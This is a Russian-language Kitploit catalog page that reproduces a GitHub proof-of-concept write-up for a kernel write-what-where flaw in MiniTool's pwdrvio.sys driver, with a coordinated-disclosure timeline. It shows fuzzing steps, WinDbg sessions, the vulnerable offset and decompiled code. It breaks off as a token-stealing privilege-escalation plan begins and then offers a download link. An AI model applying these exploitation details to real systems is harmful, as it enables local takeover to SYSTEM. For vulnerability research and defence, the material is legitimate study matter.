Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-36981-Kernel-EoP-PoC — Дата проекта: февраль 2026 г. / Уязвимость повреждения памяти в драйвере ядра MiniTool. Демонстрирует примитив произвольной записи в ядро с помощью отладчика, который можно использовать для повышения привилегий. | Kitploit
Инструменты/GitHubGitHub/canomer/cve-2026-36981-kernel-eop-poc
Повышение привилегийАнализ уязвимостейЭксплуатацияОтладчикиФаззингАнализ вредоносных программЭксплуатация Бинарных Файлов
GitHubcanomer/cve-2026-36981-kernel-eop-poc

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-36981-Kernel-EoP-PoC

Дата проекта: февраль 2026 г. / Уязвимость повреждения памяти в драйвере ядра MiniTool. Демонстрирует примитив произвольной записи в ядро с помощью отладчика, который можно использовать для повышения привилегий.

Репозиторий
2284 месяцев назадЕщё не проверено

CVE-2026-36981-Kernel-EoP-PoC

Условие write-what-where в ядре в драйвере pwdrvio.sys от MiniTool. Демонстрирует примитив произвольной записи в ядро с помощью отладчика, который можно использовать для повышения привилегий.

  • 2026-02-09 Уведомлен поставщик
  • 2026-03-05 Поставщик подтвердил
  • 2026-03-05 Запрошен CVE у MITRE
  • 2026-05-10 Публичное раскрытие после 90-дневного периода скоординированного раскрытия

https://github.com/user-attachments/assets/ac81d7ce-0be7-40a5-9334-c54350e6e30e

Произвольная запись в ядро → локальное повышение привилегий (LPE) Серьёзность: ВЫСОКАЯ
Оценка CVSS 3.1: 7.8 (LPE) Векторная строка CVSS:

  • LPE: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

    • примитив произвольной записи в ядро с помощью отладчика, который можно использовать для повышения привилегий.
    • Эксплуатируется через примитив write-what-where по смещению 0x1641 в драйвере
    • Требует инструментов отладки ядра для надёжной эксплуатации
    • Подтверждено на Windows 10 Build 19045.6466

Предварительные условия атаки:

  • Локальный доступ к целевой системе
  • Учётная запись обычного пользователя (не администратора)
  • MiniTool установлен или удалён (драйвер pwdrvio.sys загружен)

Результаты эксплуатации: LPE - Продемонстрировано повышение привилегий с помощью отладчика (NT AUTHORITY / SYSTEM), полный компрометация системы

Хронология обнаружения уязвимости

Первоначальный фаззинг и обнаружение BSOD

Дата: 5 февраля 2026
Действие: Систематический фаззинг драйвера ядра с использованием пользовательского фаззера на Python

Процесс обнаружения:

  1. Выбор цели:

    • Перечислены установленные драйверы ядра на виртуальной машине Windows 10
    • Определён pwdrvio.sys как самый старый драйвер (метка времени: 16 июня 2009 г.)
    • Файл драйвера: C:\Windows\System32\drivers\pwdrvio.sys
    • Объект устройства: \\.\PartitionWizardDiskAccesser\0
  2. Первоначальный фаззинг:

    • Разработан фаззер на Python с использованием ctypes для взаимодействия с драйвером
    • Отправлены случайные данные через WriteFile/DeviceIoControl на устройство драйвера
    • Результат: Множественные синие экраны смерти (BSOD)
  3. Активация верификатора:

    • Включён Driver Verifier для улучшенного обнаружения сбоев ```cmd verifier /standard /driver pwdrvio.sys

Конфигурация верификатора: ``` Verifier Flags: 0x001209bb Standard Flags Enabled: [X] Special pool [X] Force IRQL checking
[X] Pool tracking [X] I/O verification [X] Deadlock detection [X] DMA checking [X] Security checks [X] Miscellaneous checks [X] DDI compliance checking

### Настройка отладки ядра WinDbg
**Дата:** 5–6 февраля 2026 г.  
**Действие:** Настроена среда отладки ядра для анализа первопричины

**Процедура настройки:**

1. **Конфигурация последовательного порта VMware:**   ```
VMware Workstation Pro → VM Settings
├─ Add Hardware → Serial Port
├─ Connection: "Use named pipe"
├─ Path: \\.\pipe\com_1
├─ End: "This is the server"
└─ I/O Mode: "Yield CPU on poll" ✓
  1. Конфигурация гостевой ОС: ```cmd REM Administrator Command Prompt bcdedit /debug on bcdedit /dbgsettings serial debugport:1 baudrate:115200 shutdown /r /t 0

  2. Подключение WinDbg к хосту: ``` WinDbg → File → Attach to Kernel ├─ Port: \.\pipe\com_1 ├─ Baud Rate: 115200 ├─ Pipe: ✓ └─ Reconnect: ✓

    Result: "Kernel Debugger connection established."

Root Cause Analysis - Обнаружение произвольной записи

Дата: 6 февраля 2026 г.
Действие: Выявлен примитив произвольной записи в ядре

Шаги анализа:

  1. Анализ модуля: ``` 1: kd> lm m pwdrvio start end module name fffff805315f0000 fffff805315f8000 pwdrvio (Jun 16 2009)

    1: kd> !drvobj pwdrvio 2 Driver object (fffff805`XXXXXXXX) is for: \Driver\pwdrvio

    DriverEntry: fffff805315f6008 DriverUnload: fffff805315f1060

    Dispatch Routines: [00] IRP_MJ_CREATE fffff805315f108c [02] IRP_MJ_CLOSE fffff805315f12f8 [03] IRP_MJ_READ fffff805315f16c4 [04] IRP_MJ_WRITE fffff805315f1564 ← Target [0e] IRP_MJ_DEVICE_CONTROL fffff805`315f1404

  2. Обнаружение уязвимых инструкций:

    Установите точку останова на обработчике записи: ``` 1: kd> bp pwdrvio+0x1641 1: kd> g

    Breakpoint 0 hit pwdrvio+0x1641: fffff805`315f1641 498943f0 mov qword ptr [r11-10h],rax

Критическая находка: Выявлен примитив произвольной записи!

  • Инструкция записывает указатель ядра (RAX) по адресу [R11-0x10]
  • R11 загружается из кадра стека: mov r11, qword ptr [rbp+0xB8h]
  • Проверка адреса назначения не выполняется
  1. Анализ состояния регистров: ``` 0: kd> r rax=fffff805315f1364 ← Kernel code pointer r11=ffffe60f84c38750 ← Destination address (controlled via stack) rbp=ffffe60f84c38610 ← IRP stack frame

    0: kd> dq @rbp+0xB8 L1 ffffe60f84c386c8 ffffe60f84c38750 ← R11 loaded from here

Анализ UAF до произвольной записи

Дата: 6–7 февраля 2026 года
Действие: Прослежена уязвимость от использования после освобождения (Use-After-Free) до условия записи-что-куда (write-what-where)

Цепочка повреждения памяти:

  1. Выделение IRP: ``` 0: kd> !pool @rbp Pool page ffffe60f84c38610 region is Special pool *ffffe60f84c38000 size: 1f0 data: ffffe60f84c38e10 (NonPaged) *Irp+ Pooltag Irp+ : I/O verifier allocated IRP packets

  2. Связь буферов: ``` 0: kd> r rsi rsi=ffffe60f828df900 ← User buffer location

    0: kd> ? @rbp - @rsi Evaluate expression: 35823344 = 00000000`02229ef0 ← 35MB difference!

Анализ: пользовательский буфер НЕ доступен напрямую из кадра RBP

  • RBP указывает на структуру IRP в пуле ядра
  • Пользовательский буфер находится в другой области памяти
  • Смещение RBP+0xB8 не указывает на буфер, контролируемый пользователем
  1. Состояние использования после освобождения (Use-After-Free):

    Драйвер хранит висячие указатели в структуре IRP: ```c // Ghidra decompilation (pwdrvio+0x1564) longlong lVar1 = *(longlong *)(param_2 + 0xb8); // Load from IRP

    // No validation! lVar5 = IoBuildAsynchronousFsdRequest(...);

    // Write to [lVar1 - 0x10] *(code **)(lVar3 + -0x10) = FUN_00011364; // Arbitrary write!

Разработка локального повышения привилегий

Дата: 7–8 февраля 2026 г.
Действие: Разработана техника кражи токена

Стратегия эксплуатации:

Цель: Перезаписать токен текущего процесса токеном SYSTEM

Структура EPROCESS в Windows:``` +0x000 Pcb : _KPROCESS ... +0x4b8 Token : _EX_FAST_REF ← Token pointer location

**Процедура кражи токена:**
Скачать инструмент